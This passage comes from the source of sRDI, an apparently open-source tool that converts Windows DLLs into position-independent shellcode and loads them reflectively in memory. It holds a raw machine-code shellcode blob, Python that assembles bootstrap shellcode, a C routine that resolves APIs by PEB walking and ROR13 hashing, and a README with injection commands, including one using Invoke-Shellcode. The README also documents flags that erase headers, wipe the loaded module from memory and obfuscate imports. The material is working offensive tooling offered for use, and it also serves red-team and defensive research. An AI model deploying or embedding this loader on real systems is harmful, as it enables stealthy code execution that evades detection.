F\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\xA4\x00\x00\x00\x48\x03\xF7\x45\x8D\x6C\x24\x1F\x44\x39\x3E\x74\x7C\x8B\x46\x14\x8B\xC8
\x81\xE1\x00\x00\x00\x40\x0F\xBA\xE0\x1D\x72\x22\x85\xC9\x75\x0C\x85\xC0\x44\x8D\x41\x08\x45\x0F\x49\xC4\xEB\x33\x41\xB8\x04\x00\x00\x00\x85\xC0\x41\x8D\x40\xFE\x44\x0F\x49\xC0\xEB\x21\x85\xC9\x75\x11\xB9\x10\x00\x00\x00\x85\xC0\x44\x8D\x41\x70\x44\x0F\x49\xC1\xEB\x0C\x85\xC0\x41\xB8\x40\x00\x00\x00\x45\x0F\x49\xC5\x44\x89\x44\x24\x30\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44\x24\x30\x8B\x4E\xFC\x4C\x8D\x4C\x24\x30\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\x6B\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x45\x85\xED\x0F\x84\xBB\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\xAE\x00\x00\x00\x8B\x8F\x88\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x0F\x84\x98\x00\x00\x00\x44\x39\x79\x14\x0F\x84\x8E\x00\x00\x00\x44\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x79\x45\x8B\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x6E\x41\x8A\x00\x84\xC0\x74\x1E\x4D\x03\xC4\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x41\x8A\x00\x84\xC0\x75\xEC\x45\x3B\xEA\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x39\xEB\xBE\x8B\x41\x1C\x0F\xB7\x0A\x48\x03\xC3\x44\x8B\x04\x88\x4C\x03\xC3\xF6\x85\xD8\x00\x00\x00\x08\x74\x0E\x48\x8B\x8D\xD0\x00\x00\x00\xBA\x08\x00\x00\x00\xEB\x0D\x8B\x95\xC8\x00\x00\x00\x48\x8B\x8D\xC0\x00\x00\x00\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D
\x41\x5C\x5F\x5E\x5D\xC3\x48\x8B\xC4\x48\x89\x58\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x52\x10\x4D\x8B\x42\x30\x4D\x85\xC0\x0F\x84\xB7\x00\x00\x00\x41\x0F\x10\x42\x58\x49\x63\x40\x3C\x41\x8B\xD6\x4D\x8B\x12\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xC8\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xE9\x01\x75\xE7\x4B\x8D\x3C\x18\x44\x8B\x4F\x18\x8B\x47\x20\x41\xFF\xC9\x49\x03\xC0\x4A\x8D\x34\x88\xEB\x28\x8B\x1E\x45\x8B\xDE\x49\x03\xD8\x48\x8D\x76\xFC\x0F\xBE\x0B\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD9\x84\xC9\x75\xEF\x41\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC9\x41\x83\xF9\x01\x77\xD2\xE9\x58\xFF\xFF\xFF\x8B\x47\x24\x43\x8D\x0C\x09\x49\x03\xC0\x0F\xB7\x14\x01\x8B\x4F\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3'
61 | #MARKER:E
62 |
63 | if is64BitDLL(dllBytes):
64 |
65 | rdiShellcode = rdiShellcode64
66 |
67 | bootstrap = b''
68 | bootstrapSize = 69
69 |
70 | # call next instruction (Pushes next instruction address to stack)
71 | bootstrap += b'\xe8\x00\x00\x00\x00'
72 |
73 | # Set the offset to our DLL from pop result
74 | dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
75 |
76 | # pop rcx - Capture our current location in memory
77 | bootstrap += b'\x59'
78 |
79 | # mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
80 | bootstrap += b'\x49\x89\xc8'
81 |
82 | # mov edx,
83 | bootstrap += b'\xba'
84 | bootstrap += pack('I', functionHash)
85 |
86 | # Setup the location of our user data
87 | # add r8, +
88 | bootstrap += b'\x49\x81\xc0'
89 | userDataLocation = dllOffset + len(dllBytes)
90 | bootstrap += pack('I', userDataLocation)
91 |
92 | # mov r9d,
93 | bootstrap += b'\x41\xb9'
94 | bootstrap += pack('I', len(userData))
95 |
96 | # push rsi - save original value
97 | bootstrap += b'\x56'
98 |
99 | # mov rsi, rsp - store our current stack pointer for later
100 | bootstrap += b'\x48\x89\xe6'
101 |
102 | # and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
103 | bootstrap += b'\x48\x83\xe4\xf0'
104 |
105 | # sub rsp, 0x38 - Create some breathing room on the stack
106 | bootstrap += b'\x48\x83\xec'
107 | bootstrap += b'\x30' # 32 bytes for shadow space + 16 bytes for last args
108 |
109 | # mov qword ptr [rsp + 0x28], rcx (shellcode base) - Push in arg 5
110 | bootstrap += b'\x48\x89\x4C\x24'
111 | bootstrap += b'\x28'
112 |
113 | # add rcx,
114 | bootstrap += b'\x48\x81\xc1'
115 | bootstrap += pack('I', dllOffset)
116 |
117 | # mov dword ptr [rsp + 0x20], - Push in arg 6 just above shadow space
118 | bootstrap += b'\xC7\x44\x24'
119 | bootstrap += b'\x20'
120 | bootstrap += pack('I', flags)
121 |
122 | # call - Transfer execution to the RDI
123 | bootstrap += b'\xe8'
124 | bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
125 | bootstrap += b'\x00\x00\x00'
126 |
127 | # mov rsp, rsi - Reset our original stack pointer
128 | bootstrap += b'\x48\x89\xf4'
129 |
130 | # pop rsi - Put things back where we left them
131 | bootstrap += b'\x5e'
132 |
133 | # ret - return to caller
134 | bootstrap += b'\xc3'
135 |
136 | if len(bootstrap) != bootstrapSize:
137 | raise Exception("x64 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
138 |
139 | # Ends up looking like this in memory:
140 | # Bootstrap shellcode
141 | # RDI shellcode
142 | # DLL bytes
143 | # User data
144 | return bootstrap + rdiShellcode + dllBytes + userData
145 |
146 | else: # 32 bit
147 | rdiShellcode = rdiShellcode32
148 |
149 | bootstrap = b''
150 | bootstrapSize = 50
151 |
152 | # call next instruction (Pushes next instruction address to stack)
153 | bootstrap += b'\xe8\x00\x00\x00\x00'
154 |
155 | # Set the offset to our DLL from pop result
156 | dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
157 |
158 | # pop eax - Capture our current location in memory
159 | bootstrap += b'\x58'
160 |
161 | # push ebp
162 | bootstrap += b'\x55'
163 |
164 | # mov ebp, esp
165 | bootstrap += b'\x89\xe5'
166 |
167 | # mov edx, eax - copy our location in memory to ebx before we start modifying eax
168 | bootstrap += b'\x89\xc2'
169 |
170 | # push
171 | bootstrap += b'\x68'
172 | bootstrap += pack('I', flags)
173 |
174 | # push eax
175 | bootstrap += b'\x50'
176 |
177 | # add edx, +
178 | bootstrap += b'\x81\xc2'
179 | userDataLocation = dllOffset + len(dllBytes)
180 | bootstrap += pack('I', userDataLocation)
181 |
182 | # push
183 | bootstrap += b'\x68'
184 | bootstrap += pack('I', len(userData))
185 |
186 | # push edx
187 | bootstrap += b'\x52'
188 |
189 | # push
190 | bootstrap += b'\x68'
191 | bootstrap += pack('I', functionHash)
192 |
193 | # add eax,
194 | bootstrap += b'\x05'
195 | bootstrap += pack('I', dllOffset)
196 |
197 | # push eax
198 | bootstrap += b'\x50'
199 |
200 | # call - Transfer execution to the RDI
201 | bootstrap += b'\xe8'
202 | bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
203 | bootstrap += b'\x00\x00\x00'
204 |
205 | # add esp, 0x14 - remove arguments from stack (cdecl)
206 | bootstrap += b'\x83\xc4\x14'
207 |
208 | # leave
209 | bootstrap += b'\xc9'
210 |
211 | # ret - return to caller
212 | bootstrap += b'\xc3'
213 |
214 | if len(bootstrap) != bootstrapSize:
215 | raise Exception("x86 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
216 |
217 | # Ends up looking like this in memory:
218 | # Bootstrap shellcode
219 | # RDI shellcode
220 | # DLL bytes
221 | # User data
222 | return bootstrap + rdiShellcode + dllBytes + userData
223 |
224 | return False
225 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # sRDI - Shellcode Reflective DLL Injection
2 | sRDI allows for the conversion of DLL files to position-independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.
3 |
4 | Functionality is accomplished via two components:
5 | - C project which compiles a PE loader implementation (RDI) to shellcode
6 | - Conversion code which attaches the DLL, RDI, and user data together with a bootstrap
7 |
8 | This project is comprised of the following elements:
9 | - **ShellcodeRDI:** Compiles shellcode for the DLL loader
10 | - **NativeLoader:** Converts DLL to shellcode if necessary, then injects into memory
11 | - **DotNetLoader:** C# implementation of NativeLoader
12 | - **Python\ConvertToShellcode.py:** Convert DLL to shellcode in place
13 | - **Python\EncodeBlobs.py:** Encodes compiled sRDI blobs for static embedding
14 | - **PowerShell\ConvertTo-Shellcode.ps1:** Convert DLL to shellcode in place
15 | - **FunctionTest:** Imports sRDI C function for debug testing
16 | - **TestDLL:** Example DLL that includes two exported functions for calling on load and afterwards
17 |
18 | **The DLL does not need to be compiled with RDI; however, the technique is cross-compatible.**
19 |
20 | ## Use Cases / Examples
21 | Before use, I recommend you become familiar with [Reflective DLL Injection](https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html) and its purpose.
22 |
23 | #### Convert DLL to shellcode using python
24 | ```python
25 | from ShellcodeRDI import *
26 |
27 | dll = open("TestDLL_x86.dll", 'rb').read()
28 | shellcode = ConvertToShellcode(dll)
29 | ```
30 |
31 | #### Load DLL into memory using C# loader
32 | ```
33 | DotNetLoader.exe TestDLL_x64.dll
34 | ```
35 |
36 | #### Convert DLL with python script and load with Native EXE
37 | ```
38 | python ConvertToShellcode.py TestDLL_x64.dll
39 | NativeLoader.exe TestDLL_x64.bin
40 | ```
41 |
42 | #### Convert DLL with powershell and load with Invoke-Shellcode
43 | ```powershell
44 | Import-Module .\Invoke-Shellcode.ps1
45 | Import-Module .\ConvertTo-Shellcode.ps1
46 | Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)
47 | ```
48 |
49 | ## Flags
50 | The PE loader code uses the `flags` argument to control the various options of the loading logic:
51 |
52 | - `SRDI_CLEARHEADER` [0x1]: The DOS Header and DOS Stub for the target DLL are completely wiped with null bytes on load (except for e_lfanew). This might cause issues with stock Windows APIs when supplying the base address as a pseudo `HMODULE`.
53 | - `SRDI_CLEARMEMORY` [0x2]: After calling functions in the loaded module (`DllMain` and any exports), the DLL data will be cleared from memory. This is dangerous if you expect to continue executing code out of the module (Threads / `GetProcAddressR`).
54 | - `SRDI_OBFUSCATEIMPORTS` [0x4]: The order of imports in the module will be randomized before starting IAT patching. Additionally, the high 16 bits of the flag can be used to store the number of seconds to pause before processing the next import. For example, `flags | (3 << 16)` will pause 3 seconds between every import.
55 | - `SRDI_PASS_SHELLCODE_BASE` [0x8]: As opposed to passing supplied user data to the exported function, sRDI will instead pass the base address of the currently executing shellcode block. This can be useful for self-cleanup inside more advanced modules.
56 |
57 | ## Building
58 | This project is built using Visual Studio 2019 (v142) and Windows SDK 10. The python script is written using Python 3.
59 |
60 | The Python and Powershell scripts are located at:
61 | - `Python\ConvertToShellcode.py`
62 | - `PowerShell\ConvertTo-Shellcode.ps1`
63 |
64 | After building the project, the other binaries will be located at:
65 | - `bin\NativeLoader.exe`
66 | - `bin\DotNetLoader.exe`
67 | - `bin\TestDLL_<arch>.dll` (e.g. `TestDLL_x64.dll`)
68 | - `bin\ShellcodeRDI_<arch>.bin`
69 |
70 | If you would like to update the static blobs inside any of the tools:
71 | ```
72 | > python .\lib\Python\EncodeBlobs.py -h
73 | usage: EncodeBlobs.py [-h] solution_dir
74 |
75 | sRDI Blob Encoder
76 |
77 | positional arguments:
78 | solution_dir Solution Directory
79 |
80 | optional arguments:
81 | -h, --help show this help message and exit
82 |
83 | > python lib\Python\EncodeBlobs.py C:\code\srdi
84 |
85 | [+] Updated C:\code\srdi\Native/Loader.cpp
86 | [+] Updated C:\code\srdi\DotNet/Program.cs
87 | [+] Updated C:\code\srdi\Python/ShellcodeRDI.py
88 | [+] Updated C:\code\srdi\PowerShell/ConvertTo-Shellcode.ps1
89 |
90 | ```
91 |
92 | ## Alternatives
93 | If you find my code disgusting, or are just looking for an alternative memory-PE loader project, check out some of these:
94 |
95 | - https://github.com/fancycode/MemoryModule - Probably one of the cleanest PE loaders out there, great reference.
96 | - https://github.com/TheWover/donut - Want to convert .NET assemblies? Or how about JScript?
97 | - https://github.com/hasherezade/pe_to_shellcode - Generates polymorphic PE+shellcode hybrids.
98 | - https://github.com/DarthTon/Blackbone - Large library with many memory hacking/hooking primitives.
99 |
100 | ## Credits
101 | The basis of this project is derived from ["Improved Reflective DLL Injection" from Dan Staples](https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html) which itself is derived from the original project by [Stephen Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection).
102 |
103 | The project framework for compiling C code as shellcode is taken from [Mathew Graeber's research "PIC_BindShell"](http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html).
104 |
--------------------------------------------------------------------------------
/ShellcodeRDI.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31410.357
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestDLL", "TestDLL\TestDLL.vcxproj", "{558D08E4-48B4-4E5F-94E5-5783CF0557C4}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DotNet", "DotNet\DotNet.csproj", "{FD50DEE9-91AB-4449-BA55-27C71098076B}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeRDI", "ShellcodeRDI\ShellcodeRDI.vcxproj", "{6FC09BDB-365F-4691-BBD9-CB7F69C9527A}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Native", "Native\Native.vcxproj", "{68293519-3053-4AB6-921F-9690E2E1487F}"
13 | ProjectSection(ProjectDependencies) = postProject
14 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A} = {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}
15 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4} = {558D08E4-48B4-4E5F-94E5-5783CF0557C4}
16 | EndProjectSection
17 | EndProject
18 | Project("{888888A0-9F3D-457C-B088-3A5042F75D52}") = "Python", "Python\Python.pyproj", "{BE642266-F34D-43C3-B6E4-EEBF8E489519}"
19 | EndProject
20 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Converters", "Converters", "{F602BD8E-D2C2-4B04-85C6-292388CF1D83}"
21 | EndProject
22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunctionTest", "FunctionTest\FunctionTest.vcxproj", "{7E4557D4-F56B-408A-8C81-CBEE5EF25B11}"
23 | EndProject
24 | Global
25 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
26 | Debug|Win32 = Debug|Win32
27 | Debug|x64 = Debug|x64
28 | Release|Win32 = Release|Win32
29 | Release|x64 = Release|x64
30 | EndGlobalSection
31 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
32 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|Win32.ActiveCfg = Debug|Win32
33 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|Win32.Build.0 = Debug|Win32
34 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|x64.ActiveCfg = Debug|x64
35 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|x64.Build.0 = Debug|x64
36 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|Win32.ActiveCfg = Release|Win32
37 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|Win32.Build.0 = Release|Win32
38 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|x64.ActiveCfg = Release|x64
39 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|x64.Build.0 = Release|x64
40 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|Win32.ActiveCfg = Debug|x86
41 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|Win32.Build.0 = Debug|x86
42 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|x64.ActiveCfg = Debug|x64
43 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|x64.Build.0 = Debug|x64
44 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|Win32.ActiveCfg = Release|x86
45 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|Win32.Build.0 = Release|x86
46 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|x64.ActiveCfg = Release|x64
47 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|x64.Build.0 = Release|x64
48 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|Win32.ActiveCfg = Release|Win32
49 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|Win32.Build.0 = Release|Win32
50 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|x64.ActiveCfg = Release|x64
51 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|x64.Build.0 = Release|x64
52 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|Win32.ActiveCfg = Release|Win32
53 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|Win32.Build.0 = Release|Win32
54 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|x64.ActiveCfg = Release|x64
55 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|x64.Build.0 = Release|x64
56 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|Win32.ActiveCfg = Debug|Win32
57 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|Win32.Build.0 = Debug|Win32
58 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|x64.ActiveCfg = Debug|x64
59 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|x64.Build.0 = Debug|x64
60 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|Win32.ActiveCfg = Release|Win32
61 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|Win32.Build.0 = Release|Win32
62 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|x64.ActiveCfg = Release|x64
63 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|x64.Build.0 = Release|x64
64 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Debug|Win32.ActiveCfg = Debug|Any CPU
65 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Debug|x64.ActiveCfg = Debug|Any CPU
66 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Release|Win32.ActiveCfg = Release|Any CPU
67 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Release|x64.ActiveCfg = Release|Any CPU
68 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|Win32.ActiveCfg = Debug|Win32
69 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|Win32.Build.0 = Debug|Win32
70 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|x64.ActiveCfg = Debug|x64
71 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|x64.Build.0 = Debug|x64
72 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|Win32.ActiveCfg = Release|Win32
73 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|Win32.Build.0 = Release|Win32
74 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|x64.ActiveCfg = Release|x64
75 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|x64.Build.0 = Release|x64
76 | EndGlobalSection
77 | GlobalSection(SolutionProperties) = preSolution
78 | HideSolutionNode = FALSE
79 | EndGlobalSection
80 | GlobalSection(NestedProjects) = preSolution
81 | {FD50DEE9-91AB-4449-BA55-27C71098076B} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
82 | {68293519-3053-4AB6-921F-9690E2E1487F} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
83 | {BE642266-F34D-43C3-B6E4-EEBF8E489519} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
84 | EndGlobalSection
85 | GlobalSection(ExtensibilityGlobals) = postSolution
86 | SolutionGuid = {3C9908F0-8E60-451C-B039-CE1FD3FFB06A}
87 | EndGlobalSection
88 | EndGlobal
89 |
--------------------------------------------------------------------------------
/ShellcodeRDI/GetProcAddressWithHash.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
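// This compiles to a ROR instruction
// This is needed because _lrotr() is an external reference
// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
//
// Rotate the 32-bit value right by `shift` bits. Both arguments are wrapped in
// parentheses so that an expression argument is cast and shifted as a whole
// instead of having the cast bind to its first term only. `shift` should be in
// 1..31: a shift of 0 or 32 makes the left shift a full-width (undefined) shift.
#define ROTR32(value, shift) (((DWORD)(value) >> (BYTE)(shift)) | ((DWORD)(value) << (32 - (BYTE)(shift))))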
8 |
// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
// Only the leading fields that this header actually reads are declared here.
typedef struct _MY_PEB_LDR_DATA {
    ULONG Length;
    BOOL Initialized;
    PVOID SsHandle;
    LIST_ENTRY InLoadOrderModuleList;           // list walked by GetProcAddressWithHash
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;

typedef struct _MY_LDR_DATA_TABLE_ENTRY
{
    // Must remain the first member: GetProcAddressWithHash casts the list
    // Flink pointer straight to PMY_LDR_DATA_TABLE_ENTRY.
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;                              // module base; a NULL value ends the walk
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;                 // file name only; input to the module hash
} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
30 |
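// Resolve an exported function of an already-loaded module by hash.
//
// Walks the loader's InLoadOrderModuleList from the PEB. For every module that
// has an export directory it computes
//     hash(BaseDllName, bytes upper-cased, over MaximumLength bytes)
//   + hash(exported name, bytes, terminating NUL included)
// where hash() is "rotate right by 13, then add the byte" (ROTR32), and compares
// the sum with dwModuleFunctionHash.
//
// Parameters:
//   dwModuleFunctionHash - combined module+function hash to look for.
//
// Returns:
//   Module base + RVA of the matching export, cast to HMODULE, or NULL when no
//   loaded module has an export whose hash matches.
//
// Notes:
//   - Only the AddressOfNames table is scanned, so ordinal-only exports can
//     never be found this way.
//   - The name loop runs from index NumberOfNames-1 down to 2, so name
//     indexes 0 and 1 of every module are never examined and modules with
//     fewer than three named exports are effectively skipped.
//   - The export RVA is returned as-is; no check for forwarded exports is made.
HMODULE GetProcAddressWithHash( DWORD dwModuleFunctionHash )
{
    PPEB PebAddress;
    PMY_PEB_LDR_DATA pLdr;
    PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
    PVOID pModuleBase;
    PIMAGE_NT_HEADERS pNTHeader;
    DWORD dwExportDirRVA;
    PIMAGE_EXPORT_DIRECTORY pExportDir;
    PLIST_ENTRY pNextModule;
    DWORD dwNumFunctions;
    USHORT usOrdinalTableIndex;
    PDWORD pdwFunctionNameBase;
    PCSTR pFunctionName;
    UNICODE_STRING BaseDllName;
    DWORD dwModuleHash;
    DWORD dwFunctionHash;
    PCSTR pTempChar;
    DWORD i;

    // Read the PEB pointer through the segment register: gs:[0x60] on x64, fs:[0x30] on x86.
#if defined(_WIN64)
    PebAddress = (PPEB) __readgsqword( 0x60 );
#else
    PebAddress = (PPEB) __readfsdword( 0x30 );
#endif

    pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
    pNextModule = pLdr->InLoadOrderModuleList.Flink;
    // Flink points at InLoadOrderLinks, the first member of
    // MY_LDR_DATA_TABLE_ENTRY, so the list pointer can be cast directly.
    pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;

    // The walk ends when an entry's DllBase reads as NULL (presumably once the
    // circular list returns to its head).
    while (pDataTableEntry->DllBase != NULL)
    {
        dwModuleHash = 0;
        pModuleBase = pDataTableEntry->DllBase;
        BaseDllName = pDataTableEntry->BaseDllName;
        pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
        // DataDirectory[0] is the export directory.
        dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;

        // Get the next loaded module entry. This happens before any "continue"
        // below so every early exit from this iteration still advances the walk.
        pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;

        // If the current module does not export any functions, move on to the next module.
        if (dwExportDirRVA == 0)
        {
            continue;
        }

        // Calculate the module hash. BaseDllName is UTF-16 and the loop covers
        // MaximumLength bytes, so the interleaved zero bytes (and anything after
        // the name up to MaximumLength) are part of the hash; the
        // KERNEL32DLL_HASH / NTDLLDLL_HASH constants are computed the same way.
        for (i = 0; i < BaseDllName.MaximumLength; i++)
        {
            pTempChar = ((PCSTR) BaseDllName.Buffer + i);

            dwModuleHash = ROTR32( dwModuleHash, 13 );

            // Fold lower-case ASCII to upper-case (any byte >= 0x61 is shifted down by 0x20).
            if ( *pTempChar >= 0x61 )
            {
                dwModuleHash += *pTempChar - 0x20;
            }
            else
            {
                dwModuleHash += *pTempChar;
            }
        }

        pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);

        // A module can carry an export directory with no named exports
        // (ordinal-only). NumberOfNames - 1 would then wrap to 0xFFFFFFFF and
        // the name loop below would read far outside the name table, so skip
        // such modules explicitly.
        if (pExportDir->NumberOfNames == 0)
        {
            continue;
        }

        // We'll assume the function we are matching isn't the very first or last for safety
        // (as written, the scan starts at the last name and stops before indexes 1 and 0).

        // Index of the last entry in AddressOfNames; the scan starts there.
        dwNumFunctions = pExportDir->NumberOfNames - 1;
        pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames + (dwNumFunctions * sizeof(DWORD)));

        // We'll also iterate in reverse to switch things up

        for (i = dwNumFunctions; i > 1; i--)
        {
            dwFunctionHash = 0;
            // AddressOfNames holds RVAs of NUL-terminated ASCII names.
            pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
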